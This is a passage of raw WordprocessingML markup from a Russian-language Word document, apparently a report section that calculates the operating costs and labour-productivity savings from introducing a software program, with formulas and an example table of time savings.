      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>содержание информационных расходов;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>содержание персонала по обслуживанию комплекса технических средств;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>расходы на функционирование программы;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>расходы на содержание здания;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>прочие расходы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Расходы на содержание персонала</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Расходы по различным видам работающих определяем по формуле:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Z= nizi*(1+ Ac/100)*(1+Ап/100)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>где ni - численность персонала 1-го вида связанная с выполнением paбот;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Aс - процент отчислений на социальное страхование</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Aп - средний процент премий за год</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Расходы на функционирование программы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Расходы на функционирование программы складываются из затрат на машинное время и затрат на эксплуатацию различных принадлежностей (бумаги, краски для принтера и т.д.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Из формулы (5) произведем расчет расходов на функционирование программы:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>M=tд*Сд+tп*Cп</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>При этом можно оценить аналогичные расходы до внедрения программы и сравнить полученные значения. При внедрении программы уменьшается время работы с одной и той же задачей, за чет этого уже появляется экономия.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Расчеты на накладные расходы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Расходы на эксплуатационные принадлежности определяются простым подсчетом затрат на их приобретение по оптовым (или свободным) ценам.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Прочие расходы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Прочие расходы составляют от 1 до 3% от суммы всех эксплуатационных расходов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>до внедрения программы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pпр</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=(Z+M</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+H)*0,03</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>после внедрения программы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Pпр</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=(Z+M</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+H)*0,03</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Таким образом</w:t>
      </w:r>
      <w:r w:rsidR="007212A1" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> эксплуатационные расходы составляют:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>до внедрения программы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=Z+M</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+H+Pпр</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>после внедрения программы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>P</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>=Z+M</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>+H+Pпр</w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="195" w:name="_Toc451745939"/>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Р</w:t>
      </w:r>
      <w:r w:rsidR="007212A1" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>асчет экономии за счет увеличения производительности труда пользователя</w:t>
      </w:r>
      <w:bookmarkEnd w:id="195"/>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Если пользователь при экономии i- вида с применением программы экономит </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="114935" cy="136525"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="83" name="Рисунок 83" descr="https://antegra.ru/UserFiles/Image/de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antegra.ru/UserFiles/Image/delta.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId444" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="114935" cy="136525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ti, часов, то повышение производительности труда Pi (в %) определяется по формуле:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:noProof/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="1032150" cy="383982"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="84" name="Рисунок 84" descr="https://antegra.ru/UserFiles/Image/form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antegra.ru/UserFiles/Image/formula.jpg"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId445" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="1033586" cy="384516"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>где Fj - время, которое планировалось пользователем для выполнения работы j-вида до внедрения программы (час.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="007212A1">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Таблица 2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F2698F" w:rsidRPr="00617AC0" w:rsidRDefault="00F2698F" w:rsidP="00F2698F">
      <w:pPr>
        <w:ind w:firstLine="567"/>
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Таблица работ пользователей</w:t>
      </w:r>
      <w:r w:rsidR="007212A1" w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00617AC0">
        <w:rPr>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(пример)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="9580" w:type="dxa"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="726"/>
        <w:gridCol w:w="2775"/>
        <w:gridCol w:w="1887"/>
        <w:gridCol w:w="1321"/>
        <w:gridCol w:w="2871"/>
      </w:tblGrid>
      <w:tr w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidTr="007212A1">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>№ п/п</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2775" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Вид работ</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1887" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>До автоматизации, мин Fj</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1321" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Экономия времени, мин. DT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2871" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Повышение производительности труда Рi (в %)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidTr="007212A1">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2775" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>Ввод информации</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1887" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>40</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1321" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>20</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2871" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
              <w:t>100</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidTr="007212A1">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w:rsidR="007212A1" w:rsidRPr="00617AC0" w:rsidRDefault="007212A1" w:rsidP="00776B59">
            <w:pPr>
              <w:ind w:firstLine="0"/>
              <w:rPr>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00617AC0">
              <w:rPr>
